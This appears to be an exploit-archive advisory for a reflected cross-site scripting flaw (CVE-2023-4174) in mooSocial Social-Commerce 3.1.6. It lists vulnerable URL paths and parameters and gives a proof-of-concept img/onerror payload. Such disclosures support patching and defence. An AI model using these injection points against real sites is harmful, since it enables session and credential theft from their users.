Headline
Social-Commerce 3.1.6 Cross Site Scripting
Social-Commerce version 3.1.6 suffers from a cross site scripting vulnerability.
# Exploit Title: Social-Commerce 3.1.6 - Reflected XSS# Exploit Author: CraCkEr# Date: 28/07/2023# Vendor: mooSocial# Vendor Homepage: https://moosocial.com/# Software Link: https://social-commerce.moosocial.com/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4174## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /search/indexGET parameter 'q' is vulnerable to XSShttps://website/search/index?q=[XSS]URL path folder [1,2] is vulnerable to XSShttps://website/stores[XSS]/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recenthttps://website/user_info[XSS]/index/friendshttps://website/user_info/index[XSS]/friendshttps://website/faqs[XSS]/index?content_search=https://website/faqs/index[XSS]?content_search=XSS Payloads:j8chn"><img src=a onerror=alert(1)>ridxm[-] DoneRelated news
CVE-2023-4174
A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. The identifier VDB-236209 was assigned to this vulnerability.